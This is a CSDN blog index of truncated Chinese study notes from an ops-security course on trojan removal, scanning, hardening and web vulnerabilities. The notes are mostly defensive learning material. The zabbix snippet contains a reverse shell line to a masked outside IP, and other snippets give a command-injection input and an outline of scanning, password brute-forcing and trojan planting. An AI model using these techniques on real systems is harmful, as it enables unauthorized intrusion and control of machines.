2ox-CSDN博客

原创安全学习木马查杀打卡第二十一天

本文为苏尚武老师运维安全课程课程笔木马查杀主要针对挖矿木马和DDOS木马中毒现象：服务器带宽异常、系统产生多余不明用户、开机不明crontab和开机启动项、cpu过高、远程连不上检查步骤：1、检查系统日志2、检查系统用户3、检查异常进程4、检查异常系统文件5、检查网络6、检查系统计划任务7、检查系统后门8、检查系统服务9、检查RootKit...

2019-08-12 23:38:29 164

原创安全学习应急排查打卡第二十天

本文为苏尚武老师运维安全课程课程笔记应急工具busybox下载cd /bin/wget https://busybox.net/downloads/binaries/1.30.0-i686/busyboxchmod 755 busybox命令busybox top判断系统后门检查后门chkrootkitrkhunter查杀:cleamavwebshell查杀D...

2019-08-09 21:17:07 238

原创安全学习主机扫描打卡第十九天

本文为苏尚武老师运维安全课程课程笔记nessus使用docker安装docker pull sometheycallme/docker-nessusdocker run -t --name nessus -p 8834:8834 sometheycallme/docker-nessusmasscan安装yum install nmapyum install opens...

2019-08-08 23:18:35 195

原创安全学习资产主机扫描打卡第十八天

本文为苏尚武老师运维安全课程课程笔记appscan-网站扫描来自于IBMnetsparker很好用，很简单对公司网站评估测试

2019-08-07 22:22:06 100

原创安全学习端口、站点扫描打卡第十七天

本文为苏尚武老师运维安全课程课程笔记nmap扫描单个主机 nmap 192.168.1.1扫描存活 nmap -sP 192.168.1.0/24扫描整个子网 nmap 192.168.1.1/24扫描指定端口nmap 192.168.1.1 -p80,443,1433扫描ip地址列表nmap -iL ip.txt常用 nmap -sV -Pn -p1-65535 192.168...

2019-08-06 22:49:30 135

原创安全学习入侵检测打卡第十六天

本文为苏尚武老师运维安全课程课程笔记osqueryosquery是一个可以把操作系统信息转换成数据库的东西，查询类似于查询数据库安装故过程随意，最后配置文件cp /usr/share/osqure/osqure.exmple.conf /etc/osqure/osqeer.confosqueryi交互式模拟osqueryd 后台进程模式osquery+kolide fle...

2019-08-05 23:31:38 369

原创安全学习入侵检测-蜜罐打卡第十五天

本文为苏尚武老师运维安全课程课程笔记蜜罐本质上是一种对攻击方的欺骗捕获分析，了解攻击者使用方法和意图cowrie一款伪装成ssh的蜜罐，可以获取攻击者的字典搭建useradd cowriepasswd cowrieyum install -y git python-virtualenv bzip2-devel libffi-devel vim net-tools mysql-...

2019-08-02 23:24:34 287

原创安全学习安全防护打卡第十四天

本文为苏尚武老师运维安全课程课程笔记密码安全不要使用弱口令服务器密码和应用密码不同文档传输加密文档有价值的使用bitlocker加密电脑自动锁屏定期修改密码邮件安全拒绝接可执行文件不要点击钓鱼网址邮件加密，密码通过其他方式告知定期删除邮件上网安全物理机隔离，禁止上网，通过vmware运行网络速度不正常，要检查公共上网的时候，注册用户名密码，不使用自己信息连接公...

2019-08-01 23:14:57 265

原创安全学习安全加固openResty卡第十二天

本文为苏尚武老师运维安全课程课程笔记安装OpenResty yum install -y readline-devel pcre-devel openssl-devel git wget vim openssl-devel gcc curl tar -zxvf ngx_openresty-1.9.3.2.tar.gz...

2019-07-31 23:07:55 736

原创安全学习安全加固nginx/tomcat卡第十一天

本文为苏尚武老师运维安全课程课程笔记nginx禁止显示当前版本配置文件server_tokens off;编译安装时注释掉/src/core/nginx.h内NGINX_VERSION和NGINX_VER禁止上传目录禁止的php文件单个目录 location ~ /upload/.*\.(php|php5)?${ deny all; }多个目录location ~* ...

2019-07-30 22:55:40 118

原创安全学习安全加固centos/apache卡第十一天

本文为苏尚武老师运维安全课程课程笔记centos7提高攻击成本针对：初学者，没有目的的目的：会员、敏感yum安装expect通过mkpasswd -l 数字生成密码密码保存：1password、...

2019-07-29 23:37:20 101

原创安全学习jenkins/mysql打卡第十天天

本文为苏尚武老师运维安全课程课程笔记jenkins远程代码执行漏洞jenkinsminer挖矿安全加固，升级最新版本jenkinsmysqlmysql身份认证漏洞mysql信息探测mysql注入利用mysql安全加固...

2019-07-26 23:10:43 153

原创安全学习elasticsearch/mongodb打卡第八天

本文为苏尚武老师运维安全课程课程笔记elasticsearch搜索引擎，通常用于检索查询，通过elk来搭建社工库默认端口9200可以通过在github中去搜索漏洞案例安全加固：不要暴露公网；不要以root身份启动；9200加上http basic-autch身份认证mongodb安全加固：文章查看Mongodb黑客事件浅析确保mongodb数据库开启身份验证，创建独立账号密码...

2019-07-25 23:01:47 196

原创安全基础rsync/redis配置不当打卡第八天

本文为苏尚武老师运维安全课程课程笔记Rsyncrsync -avzP -e ’ssh -p 22 /tmp/ test@ip:/web/‘通过ssh传输rsync+crontabrsync+sersync默认端口873配置低级错误：使用root，关闭只读，取消认证通过扫描873端口，进行rsync上传导网站根目录python编写rsync扫描脚本扫描开放873端口获取rsy...

2019-07-24 23:45:00 177

原创安全基础zabbix漏洞打卡第七天

本文为苏尚武老师运维安全课程课程笔记zabbix配置不当zabbix弱口令zabbix注入利用修复建议没有更改默认口令，没有更改密码。默认口令Admin:zabbix 以及默认的guest账户没有密码进入zabbix管理页面，添加脚本。然后执行系统命令，获取其他信息得到管理权限监控项监控端口ipbash -i > & /dev/tcp/45.xx.xxx.x1/...

2019-07-23 22:53:47 227

原创安全基础文件泄露打卡第六天

本文为苏尚武老师运维安全课程课程笔记github上传代码不加密代码，获得密码。可以搜索公司域名，相关邮箱账号，查询是否泄露git文件运行init初始化代码的时候会产生.git的文件，…git文件上传直git至服务器会导致.git泄露，并获取源码，数据库密码，查找漏洞svnsvn同样在根目录下创建.svn的隐藏文件夹，包含了所有分支的commit信息和代码记录工具：Sea...

2019-07-22 23:08:01 145

原创安全基础命令执行/XSS打卡第五天

本文为苏尚武老师运维安全课程课程笔记命令执行危害高于sql注入，可以随意直接执行系统命令。没有对输入过滤php中system、exec、shell、passthru、popen、proc_popen案例：命令注入 127.0.0.1 && username -ar文件上传客户端验证、mime验证漏洞测试环境https://github.com/c0ny1/...

2019-07-19 23:53:58 349

原创安全基础web漏洞，漏洞注入打卡第四天

本文为苏尚武老师运维安全课程课程笔记SQL注入漏洞例子调整字符参数ASP注入透字猜解法。判断注入，猜表名，猜列名，猜列长如何发现sql注入漏洞通过web漏洞扫描器在参数后面去添加错误语句大量的对参数Fuzz测试直觉发现。。。。注入分类数字型注入：如年龄，页码字符型注入：如账户、注入提交方式GETPOSTCOOKIEHTTP头部注入...

2019-07-18 23:47:48 207

原创安全基础工具使用打卡第三天

本文为苏尚武老师运维安全课程课程笔记BurpSuite一款集成型渗透测试工具，功能强大，通过拦截http/https的web包，进行拦截、修改、重发数据包。基于java。需要先安装java包需要设置浏览器代理Fiddlerhttp协议代理工具，会代理电脑与互联网之间的所有的http链接火狐浏览器代理插件火狐live http headerskali系统曾用名BT...

2019-07-17 18:19:32 160

原创安全基础-渗透流程/HTTP请求打卡第二天

本文为苏尚武老师运维安全课程课程笔记目录：什么是渗透> 常规渗透> 非常规渗透 > 渗透流程 / http基础 > burpsuite >fiddler > firefox插件渗透渗透是模拟黑客攻击找到企业中的漏洞分类：白帽、黑帽常规渗透签订保密协议、针对性目标测试、指定测试范围非常规渗透APT攻击、红蓝对抗渗透测试流程攻击渗透流程图...

2019-07-16 15:45:10 288

nginx在反向代理HTTP协议的时候，默认使用的是HTTP1.0去向后端服务器获取响应的内容后在返回给客户端。HTTP1.0和HTTP1.1的一个不同之处就是，HTTP1.0不支持HTTP keep-alive。nginx在后端服务器请求时使用了HTTP1.0同时使用HTTP Header的Connection：Close通知后端服务器主动关闭连接。这样会导致任何一个客户端的请求都在后端服务器...

2019-07-15 18:06:35 735

原创阿里云mongodb磁盘占用空间过大发现及解决

转载自己的文章，截图马赛克到以前的水引不犯法把阿里云PaaS服务中的mongodb。在使用过程中发现，7天以前的数据无法查看，于是通过客户端工具连接mongdb发现在库内添加的索引内设置了超时时间阿里云mongodb磁盘占用空间过大发现及解决之前设置的是604800也就是刚好7天的时间，也导致了。7天以前的无法正常查看，于是我们延长了这一块的时间，增加至15天。然而与此同时，mon...

2019-07-15 18:03:35 864

原创安全基础-安全术语打卡第一天

本文为苏尚武老师运维安全课程课程笔记肉鸡中马机器为肉鸡肉鸡可以：计算、流量ddos攻击、刷流量广告、跳板攻击分类：家庭机、网吧机、服务器#不要尝试抓鸡：20台以上违法抓鸡只通过扫描弱口令、爆破、漏洞等方法达到中马以控制机器方法：1433、3389、3306抓鸡流程：1、扫描收集网段；2、扫描端口；3、密码爆破；4、下载木马木马分类：大马、小马约等于一句话木...

2019-07-15 17:50:16 168

蟋蟀15型